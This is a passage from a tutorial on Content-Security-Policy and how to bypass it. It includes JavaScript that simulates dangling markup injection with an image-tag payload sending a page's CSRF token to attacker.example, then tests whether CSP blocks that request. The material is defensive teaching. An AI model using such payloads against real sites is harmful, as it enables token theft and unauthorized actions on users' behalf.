<meta> HTML tag. It is mainly used to mitigate Cross Site Scripting (XSS), clickjacking and code injection attacks.
The Content-Security-Policy is made up of directives separated by a semicolon (;). Here is an example:
content-security-policy: default-src 'none'; frame-ancestors 'none'; img-src 'self'; script-src github.githubassets.com; style-src 'unsafe-inline'
You can find the details of these directives, as well as their browser compatibility, here: https://content-security-policy.com/
There are a few techniques to bypass content security policies:
Dangling markup injection is a technique for capturing data cross-domain in situations where a full Cross Site Scripting (XSS) exploit is not possible because of input filters or other defenses. It can often be used to capture sensitive information that is visible to other users, including CSRF tokens, which can then be used to perform unauthorized actions on behalf of the user. Note that the captured data leaves the page as a resource request (typically an image URL), so a policy whose img-src or default-src is restricted to 'self' blocks the exfiltration even when the injection itself succeeds.
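The following is an added example, not code from the original page: it parses a CSP header into its directives (the structure described above), simulates what a dangling, unclosed src attribute swallows from the surrounding page, and then checks whether the page's own example policy would let that request out. The origins app.example and attacker.example, the reflected HTML and the CSRF token value are constructed for the demo; the script-src check at the end only shows that any script URL on an allowlisted host is permitted, which is what makes a JSONP endpoint on such a host dangerous, and does not claim that the host in the example policy serves one.

```javascript
// Added example, not code from the original page: a minimal CSP evaluator
// and a simulation of dangling markup injection against a page that reflects
// user input. The origins app.example / attacker.example, the HTML and the
// CSRF token value are constructed for the demo.

// Parse a Content-Security-Policy header value into { directive: [sources] }.
// Directives are separated by ';', the sources of one directive by whitespace.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Fetch directives (img-src, script-src, ...) fall back to default-src when
// absent; frame-ancestors does not. null means this policy sets no limit.
function effectiveSources(policy, directive) {
  if (policy[directive]) return policy[directive];
  if (directive !== 'frame-ancestors' && policy['default-src']) return policy['default-src'];
  return null;
}

// Does one source expression permit `url` for a page served from `pageOrigin`?
// Covers 'none', 'self', '*', scheme sources and (wildcard) host sources.
// Ports and paths are ignored to keep the example short.
function sourceAllows(source, url, pageOrigin) {
  const u = new URL(url);
  if (source === "'none'") return false;
  if (source === "'self'") return u.origin === new URL(pageOrigin).origin;
  if (source === '*') return !['data:', 'blob:', 'filesystem:'].includes(u.protocol);
  if (source.startsWith("'")) return false; // 'unsafe-inline', nonces, hashes never match a URL
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return u.protocol === source.toLowerCase();
  const [scheme, hostPort] = source.includes('://') ? source.split('://') : [null, source];
  if (scheme && u.protocol !== scheme.toLowerCase() + ':') return false;
  const host = hostPort.split(':')[0].toLowerCase();
  if (host.startsWith('*.')) return u.hostname.endsWith(host.slice(1));
  return u.hostname === host;
}

function cspAllows(policy, directive, url, pageOrigin) {
  const sources = effectiveSources(policy, directive);
  if (sources === null) return true;
  return sources.some((s) => sourceAllows(s, url, pageOrigin));
}

// Constructed vulnerable page: `query` is reflected into the HTML without
// encoding, and a CSRF token appears a few lines after the reflection point.
function renderSearchPage(query) {
  return [
    `<p>Results for: ${query}</p>`,
    '<form action=/transfer method=post>',
    '<input type=hidden name=csrf value=8f3a2c91>',
    '<input type=submit value=Send>',
    '</form>',
    '<a href="/help">Help</a>',
  ].join('\n');
}

// Dangling markup payload: the src attribute is opened with a double quote and
// never closed, so the browser treats everything up to the next '"' in the
// document as part of the image URL and sends it to attacker.example.
const DANGLING_PAYLOAD = '<img src="https://attacker.example/leak?d=';

// Simulate the tokenizer's double-quoted attribute value state: the value runs
// from the opening quote to the next '"'. Returns the URL the browser would
// request, or null when no closing quote follows (the tag is then dropped).
function danglingImgUrl(html) {
  const start = html.indexOf(DANGLING_PAYLOAD);
  if (start < 0) return null;
  const valueStart = start + '<img src="'.length;
  const end = html.indexOf('"', valueStart);
  return end < 0 ? null : html.slice(valueStart, end);
}

// Put both halves together: does `header` stop the leaked request?
function leakBlockedByCsp(header, pageOrigin) {
  const url = danglingImgUrl(renderSearchPage(DANGLING_PAYLOAD));
  if (url === null) return { url: null, blocked: true };
  return { url, blocked: !cspAllows(parseCsp(header), 'img-src', url, pageOrigin) };
}

const PAGE_ORIGIN = 'https://app.example';
// The policy from the text above, with its semicolons restored.
const STRICT = "default-src 'none'; frame-ancestors 'none'; img-src 'self'; "
  + "script-src github.githubassets.com; style-src 'unsafe-inline'";
const LOOSE = "default-src 'self'; img-src *";

console.log(leakBlockedByCsp(STRICT, PAGE_ORIGIN)); // blocked: true  (img-src 'self')
console.log(leakBlockedByCsp(LOOSE, PAGE_ORIGIN));  // blocked: false (img-src *)
// An allowlisted script host lets any script URL on it load; a JSONP endpoint
// on such a host would turn that into attacker-controlled code execution.
console.log(cspAllows(parseCsp(STRICT), 'script-src',
  'https://github.githubassets.com/some.js', PAGE_ORIGIN)); // true
```

The leaked URL returned by leakBlockedByCsp contains the whole form, CSRF token included, up to the quote in <a href="/help">; under the page's example policy the request is refused because img-src is 'self', while the looser policy lets it through. The evaluator deliberately skips port and path matching and the 'strict-dynamic' / nonce / hash sources, so treat it as a reading aid for a policy, not as a replacement for testing in a real browser.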
A lot of useful payloads can be found here:
Here is a list of various JSONP endpoints that can be used to perform code injection: